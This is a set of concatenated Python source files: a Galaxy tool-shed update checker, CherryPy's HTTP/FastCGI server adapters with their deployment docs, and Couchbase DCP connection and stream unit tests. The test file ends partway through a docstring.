buff.append(asyncio.wrap_future(remote_runner.remote(x).future()))
while len(buff) > 0:
queue.put(await buff.pop(0))
queue.put(EOS())
def worker_wrapper():
loop.run_until_complete(worker())
loop.close()
t = threading.Thread(target=worker_wrapper)
t.start()
return self._factory(inner())
|
update_manager.py | """
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import threading, urllib2, logging
from galaxy.util import string_as_bool
import galaxy.util.shed_util as shed_util
from galaxy.model.orm import and_
log = logging.getLogger( __name__ )
class UpdateManager( object ):
def __init__( self, app ):
self.app = app
self.sa_session = self.app.model.context.current
# Ideally only one Galaxy server process should be able to check for repository updates.
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread( target=self.__restarter )
self.restarter.start()
self.seconds_to_sleep = app.config.hours_between_check * 3600
def __restarter( self ):
log.info( 'Update manager restarter starting up...' )
while self.running:
flush_needed = False
for repository in self.sa_session.query( self.app.model.ToolShedRepository ) \
.filter( and_( self.app.model.ToolShedRepository.table.c.update_available == False,
self.app.model.ToolShedRepository.table.c.deleted == False ) ):
if self.check_for_update( repository ):
repository.update_available = True
self.sa_session.add( repository )
flush_needed = True
if flush_needed:
self.sa_session.flush()
self.sleeper.sleep( self.seconds_to_sleep )
log.info( 'Update manager restarter shutting down...' )
def check_for_update( self, repository ):
tool_shed_url = shed_util.get_url_from_repository_tool_shed( self.app, repository )
url = '%s/repository/check_for_updates?name=%s&owner=%s&changeset_revision=%s&from_update_manager=True' % \
( tool_shed_url, repository.name, repository.owner, repository.changeset_revision )
try:
response = urllib2.urlopen( url )
text = response.read()
response.close()
except Exception, e:
# The required tool shed may be unavailable.
text = 'False'
return string_as_bool( text )
def shutdown( self ):
self.running = False
self.sleeper.wake()
class Sleeper( object ):
"""
Provides a 'sleep' method that sleeps for a number of seconds *unless*
the notify method is called (from a different thread).
"""
def __init__( self ):
self.condition = threading.Condition()
def sleep( self, seconds ):
self.condition.acquire()
self.condition.wait( seconds )
self.condition.release()
def wake( self ):
self.condition.acquire()
self.condition.notify()
self.condition.release()
|
servers.py | """
Starting in CherryPy 3.1, cherrypy.server is implemented as an
:ref:`Engine Plugin<plugins>`. It's an instance of
:class:`cherrypy._cpserver.Server`, which is a subclass of
:class:`cherrypy.process.servers.ServerAdapter`. The ``ServerAdapter`` class
is designed to control other servers, as well.
Multiple servers/ports
======================
If you need to start more than one HTTP server (to serve on multiple ports, or
protocols, etc.), you can manually register each one and then start them all
with engine.start::
s1 = ServerAdapter(cherrypy.engine, MyWSGIServer(host='0.0.0.0', port=80))
s2 = ServerAdapter(cherrypy.engine, another.HTTPServer(host='127.0.0.1', SSL=True))
s1.subscribe()
s2.subscribe()
cherrypy.engine.start()
.. index:: SCGI
FastCGI/SCGI
============
There are also Flup\ **F**\ CGIServer and Flup\ **S**\ CGIServer classes in
:mod:`cherrypy.process.servers`. To start an fcgi server, for example,
wrap an instance of it in a ServerAdapter::
addr = ('0.0.0.0', 4000)
f = servers.FlupFCGIServer(application=cherrypy.tree, bindAddress=addr)
s = servers.ServerAdapter(cherrypy.engine, httpserver=f, bind_addr=addr)
s.subscribe()
The :doc:`cherryd</deployguide/cherryd>` startup script will do the above for
you via its `-f` flag.
Note that you need to download and install `flup <http://trac.saddi.com/flup>`_
yourself, whether you use ``cherryd`` or not.
.. _fastcgi:
.. index:: FastCGI
FastCGI
-------
A very simple setup lets your cherry run with FastCGI.
You just need the flup library,
plus a running Apache server (with ``mod_fastcgi``) or lighttpd server.
CherryPy code
^^^^^^^^^^^^^
hello.py::
#!/usr/bin/python
import cherrypy
class HelloWorld:
\"""Sample request handler class.\"""
def index(self):
return "Hello world!"
index.exposed = True
cherrypy.tree.mount(HelloWorld())
# CherryPy autoreload must be disabled for the flup server to work
cherrypy.config.update({'engine.autoreload_on':False})
Then run :doc:`/deployguide/cherryd` with the '-f' arg::
cherryd -c <myconfig> -d -f -i hello.py
Apache
^^^^^^
At the top level in httpd.conf::
FastCgiIpcDir /tmp
FastCgiServer /path/to/cherry.fcgi -idle-timeout 120 -processes 4
And inside the relevant VirtualHost section::
# FastCGI config
AddHandler fastcgi-script .fcgi
ScriptAliasMatch (.*$) /path/to/cherry.fcgi$1
Lighttpd
^^^^^^^^
For `Lighttpd <http://www.lighttpd.net/>`_ you can follow these
instructions. Within ``lighttpd.conf`` make sure ``mod_fastcgi`` is
active within ``server.modules``. Then, within your ``$HTTP["host"]``
directive, configure your fastcgi script like the following::
$HTTP["url"] =~ "^/" {
fastcgi.server = (
"/" => (
"script.fcgi" => (
"bin-path" => "/path/to/your/script.fcgi",
"socket" => "/tmp/script.sock",
"check-local" => "disable",
"disable-time" => 1,
"min-procs" => 1,
"max-procs" => 1, # adjust as needed
),
),
)
} # end of $HTTP["url"] =~ "^/"
Please see `Lighttpd FastCGI Docs
<http://redmine.lighttpd.net/wiki/lighttpd/Docs:ModFastCGI>`_ for an explanation
of the possible configuration options.
"""
import sys
import time
class ServerAdapter(object):
"""Adapter for an HTTP server.
If you need to start more than one HTTP server (to serve on multiple
ports, or protocols, etc.), you can manually register each one and then
start them all with bus.start:
s1 = ServerAdapter(bus, MyWSGIServer(host='0.0.0.0', port=80))
s2 = ServerAdapter(bus, another.HTTPServer(host='127.0.0.1', SSL=True))
s1.subscribe()
s2.subscribe()
bus.start()
"""
def __init__(self, bus, httpserver=None, bind_addr=None):
self.bus = bus
self.httpserver = httpserver
self.bind_addr = bind_addr
self.interrupt = None
self.running = False
def subscribe(self):
self.bus.subscribe('start', self.start)
self.bus.subscribe('stop', self.stop)
def unsubscribe(self):
self.bus.unsubscribe('start', self.start)
self.bus.unsubscribe('stop', self.stop)
def start(self):
"""Start the HTTP server."""
if self.bind_addr is None:
on_what = "unknown interface (dynamic?)"
elif isinstance(self.bind_addr, tuple):
host, port = self.bind_addr
on_what = "%s:%s" % (host, port)
else:
on_what = "socket file: %s" % self.bind_addr
if self.running:
self.bus.log("Already serving on %s" % on_what)
return
self.interrupt = None
if not self.httpserver:
raise ValueError("No HTTP server has been created.")
# Start the httpserver in a new thread.
if isinstance(self.bind_addr, tuple):
wait_for_free_port(*self.bind_addr)
import threading
t = threading.Thread(target=self._start_http_thread)
t.setName("HTTPServer " + t.getName())
t.start()
self.wait()
self.running = True
self.bus.log("Serving on %s" % on_what)
start.priority = 75
def _start_http_thread(self):
"""HTTP servers MUST be running in new threads, so that the
main thread persists to receive KeyboardInterrupt's. If an
exception is raised in the httpserver's thread then it's
trapped here, and the bus (and therefore our httpserver)
are shut down.
"""
try:
self.httpserver.start()
except KeyboardInterrupt:
self.bus.log("<Ctrl-C> hit: shutting down HTTP server")
self.interrupt = sys.exc_info()[1]
self.bus.exit()
except SystemExit:
self.bus.log("SystemExit raised: shutting down HTTP server")
self.interrupt = sys.exc_info()[1]
self.bus.exit()
raise
except:
self.interrupt = sys.exc_info()[1]
self.bus.log("Error in HTTP server: shutting down",
traceback=True, level=40)
self.bus.exit()
raise
def wait(self):
"""Wait until the HTTP server is ready to receive requests."""
while not getattr(self.httpserver, "ready", False):
if self.interrupt:
raise self.interrupt
time.sleep(.1)
# Wait for port to be occupied
if isinstance(self.bind_addr, tuple):
host, port = self.bind_addr
wait_for_occupied_port(host, port)
def stop(self):
"""Stop the HTTP server."""
if self.running:
# stop() MUST block until the server is *truly* stopped.
self.httpserver.stop()
# Wait for the socket to be truly freed.
if isinstance(self.bind_addr, tuple):
wait_for_free_port(*self.bind_addr)
self.running = False
self.bus.log("HTTP Server %s shut down" % self.httpserver)
else:
self.bus.log("HTTP Server %s already shut down" % self.httpserver)
stop.priority = 25
def restart(self):
"""Restart the HTTP server."""
self.stop()
self.start()
class FlupCGIServer(object):
"""Adapter for a flup.server.cgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the CGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.cgi import WSGIServer
self.cgiserver = WSGIServer(*self.args, **self.kwargs)
self.ready = True
self.cgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
class FlupFCGIServer(object):
"""Adapter for a flup.server.fcgi.WSGIServer."""
def __init__(self, *args, **kwargs):
if kwargs.get('bindAddress', None) is None:
import socket
if not hasattr(socket, 'fromfd'):
raise ValueError(
'Dynamic FCGI server not available on this platform. '
'You must use a static or external one by providing a '
'legal bindAddress.')
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the FCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.fcgi import WSGIServer
self.fcgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.fcgiserver._installSignalHandlers = lambda: None
self.fcgiserver._oldSIGs = []
self.ready = True
self.fcgiserver.run()
def stop(self):
"""Stop the HTTP server."""
# Forcibly stop the fcgi server main event loop.
self.fcgiserver._keepGoing = False
# Force all worker threads to die off.
self.fcgiserver._threadPool.maxSpare = self.fcgiserver._threadPool._idleCount
self.ready = False
class FlupSCGIServer(object):
"""Adapter for a flup.server.scgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the SCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.scgi import WSGIServer
self.scgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.scgiserver._installSignalHandlers = lambda: None
self.scgiserver._oldSIGs = []
self.ready = True
self.scgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
# Forcibly stop the scgi server main event loop.
self.scgiserver._keepGoing = False
# Force all worker threads to die off.
self.scgiserver._threadPool.maxSpare = 0
def client_host(server_host):
"""Return the host on which a client can connect to the given listener."""
if server_host == '0.0.0.0':
# 0.0.0.0 is INADDR_ANY, which should answer on localhost.
return '127.0.0.1'
if server_host in ('::', '::0', '::0.0.0.0'):
# :: is IN6ADDR_ANY, which should answer on localhost.
# ::0 and ::0.0.0.0 are non-canonical but common ways to write IN6ADDR_ANY.
return '::1'
return server_host
def check_port(host, port, timeout=1.0):
"""Raise an error if the given port is not free on the given host."""
if not host:
raise ValueError("Host values of '' or None are not allowed.")
host = client_host(host)
port = int(port)
import socket
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6 addresses)
try:
info = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM)
except socket.gaierror:
if ':' in host:
info = [(socket.AF_INET6, socket.SOCK_STREAM, 0, "", (host, port, 0, 0))]
else:
info = [(socket.AF_INET, socket.SOCK_STREAM, 0, "", (host, port))]
for res in info:
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(timeout)
s.connect((host, port))
s.close()
raise IOError("Port %s is in use on %s; perhaps the previous "
"httpserver did not shut down properly." %
(repr(port), repr(host)))
except socket.error:
if s:
s.close()
# Feel free to increase these defaults on slow systems:
free_port_timeout = 0.1
occupied_port_timeout = 1.0
def wait_for_free_port(host, port, timeout=None):
"""Wait for the specified port to become free (drop requests)."""
if not host:
raise ValueError("Host values of '' or None are not allowed.")
if timeout is None:
timeout = free_port_timeout
for trial in range(50):
try:
# we are expecting a free port, so reduce the timeout
check_port(host, port, timeout=timeout)
except IOError:
# Give the old server thread time to free the port.
time.sleep(timeout)
else:
return
raise IOError("Port %r not free on %r" % (port, host))
def wait_for_occupied_port(host, port, timeout=None):
"""Wait for the specified port to become active (receive requests)."""
if not host:
raise ValueError("Host values of '' or None are not allowed.")
if timeout is None:
timeout = occupied_port_timeout
for trial in range(50):
try:
check_port(host, port, timeout=timeout)
except IOError:
return
else:
time.sleep(timeout)
raise IOError("Port %r not bound on %r" % (port, host))
|
dcp_tests.py | from dcp_base import DCPBase
from dcp_new.constants import *
from dcp_bin_client import *
from mc_bin_client import MemcachedClient as McdClient
from memcached.helper.data_helper import MemcachedClientHelper
import unittest
from memcacheConstants import *
from threading import Thread
from remote.remote_util import RemoteMachineShellConnection
from datetime import datetime
import time
class DcpTestCase(DCPBase):
def setUp(self):
super(DCPBase, self).setUp()
self.remote_shell = RemoteMachineShellConnection(self.cluster.master)
# Create default bucket and add rbac user
self.bucket_util.create_default_bucket()
bucket_name = "default"
self.bucket_util.add_rbac_user()
self.sleep(30)
self.dcp_client = DcpClient(host=self.cluster.master.ip)
self.dcp_client.sasl_auth_plain("cbadminbucket","password")
self.dcp_client.bucket_select(bucket_name)
self.mcd_client = MemcachedClientHelper.direct_client(self.cluster.master, self.bucket_util.buckets[0])
def tearDown(self):
self.dcp_client.close()
self.mcd_client.close()
"""Basic dcp open consumer connection test
Verifies that when the open dcp consumer command is used there is a
connection instance that is created on the server and that when the
tcp connection is closed the connection is removed from the server"""
def test_open_consumer_connection_command(self):
response = self.dcp_client.open_consumer("mystream")
print("response: {0}".format(response))
assert response['status'] == SUCCESS
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert response['eq_dcpq:mystream:type'] == 'consumer'
self.dcp_client.close()
self.sleep(1)
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert 'eq_dcpq:mystream:type' not in response
"""Basic dcp open producer connection test
Verifies that when the open dcp producer command is used there is a
connection instance that is created on the server and that when the
tcp connection is closed the connection is removed from the server"""
def test_open_producer_connection_command(self):
response = self.dcp_client.open_producer("mystream")
print("response: {0}".format(response))
assert response['status'] == SUCCESS
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert response['eq_dcpq:mystream:type'] == 'producer'
self.dcp_client.close()
self.sleep(1)
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert 'eq_dcpq:mystream:type' not in response
def test_open_notifier_connection_command(self):
"""Basic dcp open notifier connection test
Verifies that when the open dcp notifier command is used there is a
connection instance that is created on the server and that when the
tcp connection is closed the connection is removed from the server"""
response = self.dcp_client.open_notifier("notifier")
print("response: {0}".format(response))
assert response['status'] == SUCCESS
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert response['eq_dcpq:notifier:type'] == 'notifier'
self.dcp_client.close()
self.sleep(1)
response = self.mcd_client.stats('dcp')
print("response: {0}".format(response))
assert 'eq_dcpq:mystream:type' not in response
"""Open consumer connection same key
Verifies a single consumer connection can be opened. Then opens a
second consumer connection with the same key as the original. Expects
that the first consumer connection is closed. Stats should reflect 1
consumer connected
"""
def test_open_consumer_connection_same_key(self):
stream = "mystream"
self.dcp_client.open_consumer(stream)
c1_stats = self.mcd_client.stats('dcp')
assert c1_stats['eq_dcpq:' + stream + ':type'] == 'consumer'
self.sleep(2)
c2_stats = None
for i in range(10):
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_consumer(stream)
assert response['status'] == SUCCESS
c2_stats = self.mcd_client.stats('dcp')
assert c2_stats is not None
assert c2_stats['eq_dcpq:' + stream + ':type'] == 'consumer'
assert c2_stats['ep_dcp_count'] == '1'
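# The replacement connection must have been created after the one it displaced.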
assert c1_stats['eq_dcpq:' + stream + ':created'] < \
c2_stats['eq_dcpq:' + stream + ':created']
"""Open producer same key
Verifies a single producer connection can be opened. Then opens a
second producer connection with the same key as the original. Expects
that the first producer connection is closed. Stats should reflect 1
producer connected.
"""
@unittest.skip("Needs Debug")
def test_open_producer_connection_same_key(self):
stream = "mystream"
self.dcp_client.open_producer(stream)
c1_stats = self.mcd_client.stats('dcp')
assert c1_stats['eq_dcpq:' + stream + ':type'] == 'producer'
self.sleep(2)
c2_stats = None
for i in range(10):
conn = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = conn.open_producer(stream)
assert response['status'] == SUCCESS
c2_stats = self.mcd_client.stats('dcp')
assert c2_stats['eq_dcpq:' + stream + ':type'] == 'producer'
# CBQE-3410 1 or 2 is ok
assert c2_stats['ep_dcp_count'] == '1' or c2_stats['ep_dcp_count'] == '2'
assert c1_stats['eq_dcpq:' + stream + ':created'] < \
c2_stats['eq_dcpq:' + stream + ':created']
""" Open consumer empty name
Tries to open a consumer connection with empty string as name. Expects
to receive a client error.
"""
def test_open_consumer_no_name(self):
response = self.dcp_client.open_consumer("")
assert response['status'] == ERR_EINVAL
""" Open producer empty name
Tries to open a producer connection with empty string as name. Expects
to receive a client error.
"""
def test_open_producer_no_name(self):
response = self.dcp_client.open_producer("")
assert response['status'] == ERR_EINVAL
""" Open n producers and consumers
Open n consumer and n producer connections. Check dcp stats and verify number
of open connections = 2n with corresponding values for each connection type.
Expects each open connection response return true.
"""
def test_open_n_consumer_producers(self):
n = 16
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(2 * n)]
ops = []
for i in xrange(n):
op = conns[i].open_consumer("consumer{0}".format(i))
ops.append(op)
op = conns[n + i].open_producer("producer{0}".format(n + i))
ops.append(op)
for op in ops:
assert op['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
assert stats['ep_dcp_count'] == str(n * 2)
def test_open_notifier(self):
response = self.dcp_client.open_notifier("notifier")
assert response['status'] == SUCCESS
def test_open_notifier_no_name(self):
response = self.dcp_client.open_notifier("")
assert response['status'] == ERR_EINVAL
"""Basic add stream test
This test verifies a simple add stream command. It expects that a stream
request message will be sent to the producer before a response for the
add stream command is returned."""
@unittest.skip("invalid: MB-11890")
def test_add_stream_command(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
@unittest.skip("invalid: MB-11890")
def test_add_stream_reopen_connection(self):
for i in range(10):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
self.dcp_client.reconnect()
"""Add stream to producer
Attempt to add stream to a producer connection. Expects to receive
client error response."""
@unittest.skip("invalid: MB-11890")
def test_add_stream_to_producer(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_ECLIENT
"""Add stream test without open connection
This test attempts to add a stream without identifying the
client as a consumer or producer. Expects the request
to throw client error"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_without_connection(self):
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_ECLIENT
"""Add stream command with no consumer vbucket
Attempts to add a stream when no vbucket exists on the consumer. The
client should expect a not my vbucket response immediately"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_not_my_vbucket(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(1025, 0)
assert response['status'] == ERR_NOT_MY_VBUCKET
"""Add stream when stream exists
Creates a stream and then attempts to create another stream for the
same vbucket. Expects to fail with an exists error."""
@unittest.skip("invalid: MB-11890")
def test_add_stream_exists(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_KEY_EEXISTS
"""Add stream to new consumer
Creates two clients each with consumers using the same key.
Attempts to add stream to first consumer and second consumer.
Expects that adding stream to second consumer passes"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_to_duplicate_consumer(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
dcp_client2 = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = dcp_client2.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_ECLIENT
response = dcp_client2.add_stream(0, 0)
assert response['status'] == SUCCESS
dcp_client2.close()
"""
Add a stream to consumer with the takeover flag set = 1. Expects add stream
command to return successfully.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_takeover(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 1)
assert response['status'] == SUCCESS
"""
Open n consumer connections. Add one stream to each consumer for the same
vbucket. Expects every add stream request to succeed.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_n_consumers_1_stream(self):
n = 16
self.verification_seqno = n
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(n)]
for i in xrange(n):
response = self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = "mystream{0}".format(i)
response = conns[i].open_consumer(stream)
assert response['status'] == SUCCESS
response = conns[i].add_stream(0, 1)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
assert stats['ep_dcp_count'] == str(n)
self.wait_for_persistence(self.mcd_client)
"""
Open n consumer connections. Add n streams to each consumer for a unique vbucket
per connection. Expects every add stream request to succeed.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_n_consumers_n_streams(self):
n = 8
self.verification_seqno = n
vb_ids = self.all_vbucket_ids()
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(n)]
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = "mystream{0}".format(i)
response = conns[i].open_consumer(stream)
assert response['status'] == SUCCESS
for vb in vb_ids[0:n]:
response = conns[i].add_stream(vb, 0)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
assert stats['ep_dcp_count'] == str(n)
"""
Open a single consumer and add stream for all active vbuckets with the
takeover flag set in the request. Expects every add stream request to succeed.
"""
@unittest.skip("invalid: MB-11890")
def test_add_stream_takeover_all_vbuckets(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
# parsing keys: 'vb_1', 'vb_0',...
vb_ids = self.all_vbucket_ids()
for i in vb_ids:
response = self.dcp_client.add_stream(i, 1)
assert response['status'] == SUCCESS
@unittest.skip("invalid: MB-11890")
def test_add_stream_various_ops(self):
""" verify consumer can receive mutations created by various mcd ops """
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, val, 0)
for i in range(100):
# append + prepend
self.mcd_client.append('key', str(i), 0, 0)
val += str(i)
self.mcd_client.prepend('key', str(i), 0, 0)
val = str(i) + val
self.mcd_client.incr('key2', init=0, vbucket=0)
for i in range(100):
self.mcd_client.incr('key2', amt=2, vbucket=0)
for i in range(100):
self.mcd_client.decr('key2', amt=2, vbucket=0)
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
stats = self.mcd_client.stats('dcp')
mutations = stats['eq_dcpq:mystream:stream_0_start_seqno']
assert mutations == '402'
self.verification_seqno = 402
def test_stream_request_deduped_items(self):
""" request a duplicate mutation """
response = self.dcp_client.open_producer("mystream")
# get vb uuid
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
self.mcd_client.set('snap1', 0, 0, 'value1', 0)
self.mcd_client.set('snap1', 0, 0, 'value2', 0)
self.mcd_client.set('snap1', 0, 0, 'value3', 0)
# attempt to request mutations 1 and 2
start_seqno = 1
end_seqno = 2
stream = self.dcp_client.stream_req(0, 0,
start_seqno,
end_seqno,
vb_uuid)
assert stream.status is SUCCESS
stream.run()
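# The three sets on 'snap1' are de-duplicated, so only the final revision (seqno 3) is streamed.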
assert stream.last_by_seqno == 3
self.verification_seqno = 3
def test_stream_request_dupe_backfilled_items(self):
""" request mutations across memory/backfill mutations"""
self.dcp_client.open_producer("mystream")
def load(i):
""" load 3 and persist """
set_ops = [self.mcd_client.set('key%s' % i, 0, 0, 'value', 0) \
for x in range(3)]
self.wait_for_persistence(self.mcd_client)
def stream(end, vb_uuid):
backfilled = False
# send a stream request for mutations from the 1st snapshot
stream = self.dcp_client.stream_req(0, 0, 0, end, vb_uuid)
# check if items were backfilled before streaming
stats = self.mcd_client.stats('dcp')
num_backfilled = \
int(stats['eq_dcpq:mystream:stream_0_backfill_sent'])
if num_backfilled > 0:
backfilled = True
stream.run() # exhaust stream
assert stream.has_response() == False
self.dcp_client.close_stream(0)
return backfilled
# get vb uuid
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# load stream snapshot 1
load('a')
stream(3, vb_uuid)
# load some more items
load('b')
# attempt to stream until request contains backfilled items
tries = 10
backfilled = stream(4, vb_uuid)
while not backfilled and tries > 0:
tries -= 1
self.sleep(2)
backfilled = stream(4, vb_uuid)
assert backfilled, "ERROR: no back filled items were streamed"
self.verification_seqno = 6
def test_backfill_from_default_vb_uuid(self):
""" attempt a backfill stream request using vb_uuid = 0 """
def disk_stream():
stream = self.dcp_client.stream_req(0, 0, 0, 1, 0)
last_by_seqno = 0
persisted = False
assert stream.status is SUCCESS
snap = stream.next_response()
if snap['flag'].find('disk') == 0:
persisted = True
return persisted
self.dcp_client.open_producer("mystream")
self.mcd_client.set('key', 0, 0, 'value', 0)
tries = 20
while tries > 0 and not disk_stream():
tries -= 1
self.sleep(1)
assert tries > 0, "Items never persisted to disk"
"""Close stream that has not been initialized.
Expects client error."""
@unittest.skip("Needs Debug")
def test_close_stream_command(self):
response = self.dcp_client.close_stream(0)
assert response['status'] == ERR_ECLIENT
"""Close a consumer stream. Expects close operation to
return a success."""
@unittest.skip("invalid: MB-11890")
def test_close_consumer_stream(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
"""
Open a consumer connection. Add stream for a selected vbucket. Then close stream.
Immediately after closing stream send a request to add stream again. Expects that
stream can be added after closed.
"""
@unittest.skip("invalid: MB-11890")
def test_close_stream_reopen(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == ERR_KEY_EEXISTS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
"""
open and close stream as a consumer then takeover
stream as producer and attempt to reopen stream
from same vbucket
"""
@unittest.skip("invalid scenario: MB-11785")
def test_close_stream_reopen_as_producer(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.add_stream(0, 0)
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, 0, 0, 0)
assert response.status == SUCCESS
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == ERR_KEY_ENOENT
"""
Add stream to a consumer connection for a selected vbucket. Start sending ops to node.
Send close stream command to selected vbucket. Expects that consumer has not received any
subsequent mutations after producer received the close request.
"""
def test_close_stream_with_ops(self):
stream_closed = False
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
doc_count = 1000
for i in range(doc_count):
self.mcd_client.set('key%s' % i, 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0)
while stream.has_response():
response = stream.next_response()
if not stream_closed:
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS, response
stream_closed = True
if response is None:
break
assert stream.last_by_seqno < doc_count, \
"Error: recieved all mutations on closed stream"
self.verification_seqno = doc_count
"""
Sets up a producer connection, opens a stream, and then sends 2 close stream requests. Expects
the second close stream request to return ENOENT.
"""
def test_close_stream_twice(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, 1000, 0)
assert response.status == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
response = self.dcp_client.close_stream(0)
assert response['status'] == ERR_KEY_ENOENT
"""
Test verifies that if multiple consumers are streaming from a vbucket
and one of the consumers closes, the producer doesn't stop
sending changes to the other consumers.
"""
@unittest.skip("invalid: MB-11890")
def test_close_stream_n_consumers(self):
n = 16
for i in xrange(100):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
# add stream to be close by different client
client2 = DcpClient(self.cluster.master.ip, self.cluster.master.port)
closestream = "closestream"
client2.open_consumer(closestream)
client2.add_stream(0, 0)
conns = [DcpClient(self.cluster.master.ip, self.cluster.master.port) for i in xrange(n)]
for i in xrange(n):
stream = "mystream{0}".format(i)
conns[i].open_consumer(stream)
conns[i].add_stream(0, 1)
if i == int(n / 2):
# close stream
response = client2.close_stream(0)
assert response['status'] == SUCCESS
self.sleep(2)
stats = self.mcd_client.stats('dcp')
key = "eq_dcpq:{0}:stream_0_state".format(closestream)
assert stats[key] == 'dead'
for i in xrange(n):
key = "eq_dcpq:mystream{0}:stream_0_state".format(i)
assert stats[key] in ('reading', 'pending')
client2.close()
self.verification_seqno = 100
"""Request failover log without connection
